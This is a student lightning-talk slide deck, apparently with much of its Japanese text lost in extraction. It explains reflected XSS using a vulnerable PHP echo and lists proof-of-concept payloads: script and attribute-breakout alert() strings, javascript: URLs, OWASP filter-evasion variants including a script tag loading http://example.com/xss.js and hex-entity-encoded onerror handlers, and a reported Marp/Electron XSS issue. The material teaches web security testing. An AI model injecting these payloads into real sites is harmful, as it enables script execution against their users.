Upgrade to Pro — share decks privately, control downloads, hide ads and more …

XSSの入力値を調べてみた / searching xss insertion value

Tomoyuki KOYAMA
February 03, 2018
Technology
3
1.4k

XSSの入力値を調べてみた / searching xss insertion value

2018/02/03 学生LT at freee

Tomoyuki KOYAMA

February 03, 2018
Tweet

More Decks by Tomoyuki KOYAMA

See All by Tomoyuki KOYAMA
Reading HTTP Client Hints
tomoyk
0
42
Log message with JSON item count for root cause analysis in microservices
tomoyk
0
120
Distributed Log Search Based on Time Series Access and Service Relations
tomoyk
0
260
Webアプリを動かすまでのインフラ構築 / infra-build-for-web-app
tomoyk
0
340
コンピュータが大好きな私が大学院進学した理由 / Why I chose graduate school
tomoyk
2
780
この先生きのこるための学び方 / how-to-learn-tech
tomoyk
1
340
佐川急便のフィッシングサイトを調べてみた / Analysis of sagawa fishing site
tomoyk
1
150
既存のWebアプリをセキュアにするためにやったこと / Student-LT-WebSec
tomoyk
0
160
パケットを覗いてみよう / Packet workshop for beginners
tomoyk
0
270

Other Decks in Technology

See All in Technology
マルチモーダル / AI Agent / LLMOps 3つの技術トレンドで理解するLLMの今後の展望
hirosatogamo
37
12k
エンジニア人生の拡張性を高める 「探索型キャリア設計」の提案
tenshoku_draft
1
120
マルチプロダクトな開発組織で 「開発生産性」に向き合うために試みたこと / Improving Multi-Product Dev Productivity
sugamasao
1
300
【若手エンジニア応援LT会】ソフトウェアを学んできた私がインフラエンジニアを目指した理由
kazushi_ohata
0
150
初心者向けAWS Securityの勉強会mini Security-JAWSを9ヶ月ぐらい実施してきての近況
cmusudakeisuke
0
120
Incident Response Practices: Waroom's Features and Future Challenges
rrreeeyyy
0
160
安心してください、日本語使えますよ―Ubuntu日本語Remix提供休止に寄せて― 2024-11-17
nobutomurata
0
980
Making your applications cross-environment - OSCG 2024 NA
salaboy
0
180
複雑なState管理からの脱却
sansantech
PRO
1
130
VideoMamba: State Space Model for Efficient Video Understanding
chou500
0
190
リンクアンドモチベーション ソフトウェアエンジニア向け紹介資料 / Introduction to Link and Motivation for Software Engineers
lmi
4
300k
TypeScript、上達の瞬間
sadnessojisan
46
13k

Featured

See All Featured
Gamification - CAS2011
davidbonilla
80
5k
The Art of Delivering Value - GDevCon NA Keynote
reverentgeek
8
730
Raft: Consensus for Rubyists
vanstee
136
6.6k
The Invisible Side of Design
smashingmag
298
50k
How to train your dragon (web standard)
notwaldorf
88
5.7k
GraphQLとの向き合い方2022年版
quramy
43
13k
Rails Girls Zürich Keynote
gr2m
94
13k
CoffeeScript is Beautiful & I Never Want to Write Plain JavaScript Again
sstephenson
159
15k
Distributed Sagas: A Protocol for Coordinating Microservices
caitiem20
329
21k
ReactJS: Keep Simple. Everything can be a component!
pedronauck
665
120k
Scaling GitHub
holman
458
140k
The Cult of Friendly URLs
andyhume
78
6k

Transcript

  1. XSS

  2. B1 Twitter: @tmyk_kym : https://blog.koyama.me/ : Network/Web/Server/Security : PyCon JP,

    Seccamp, etc

  3. XSS (Cross Site Scripting) HTML CWE-79: Improper Neutralization of Input

    During Web Page Generation ('Cross-site Scripting') (3.0)

  4. ... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];

    ?></h1> $_GET['mode'] hello <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1>hello</h1>

  5. ... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];

    ?></h1> $_GET['mode'] <script>alert()</script> <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><script>alert()</script></h1>

  6. XSS Stored XSS( ) Re ected XSS( ) DOM Based

    XSS

  7. XSS == XSS

  8. <script>alert(1)</script> "><script>alert(1)</script> " onmouseover="alert(1) x" onerror="alert(1) <- img src javascript:alert(1)

    <- a href

  9. XSS

  10. ? / . XSS . XSS .

  11. ?

  12. OWASP OWASP XSS 2015 XSS - OWASP https://jpcertcc.github.io/OWASPdocuments/CheatSheets/XSSFilterEvasion.html

  13. ( ) 3

  14. [1] <SCRIPT/XSS SRC="http://example.com/xss.js"> </SCRIPT> / . ... <script xss="" src="http://example.com/xss.js">

    </script>

  15. [2] <<SCRIPT>alert("XSS");//<</SCRIPT> HTML XSS . ... "><script> alert("XSS");//< </script>

  16. [3] <img src=x onerror=&#x6A&#x61&#x76&#x61&#x73 &#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65 &#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> &#x... HTML (16 )

    . ... <img src="x" onerror="javascript:alert('XSS')">

  17. ( )

  18. ( ) <img src=javascript:alert('XSS')> <img src=javascript: alert(String.fromCharCode(88,83,83))> <META HTTP-EQUIV="refresh" CONTENT="3;

    URL=http://;URL=http://yahoo.co.jp/;">
  19. None

  20. Electron Marp Electron Web ... <script>alert()</script> alert ...( )

  21. ?

  22. JVN#21174546: Marp JavaScript https://jvn.jp/jp/JVN21174546/ However, sanitizing inline script should consider

    on future. [Security issue] Remote script can read user local resource · Issue #187 · yhatt/marp “ “

  23. XSS XSS alert() Electron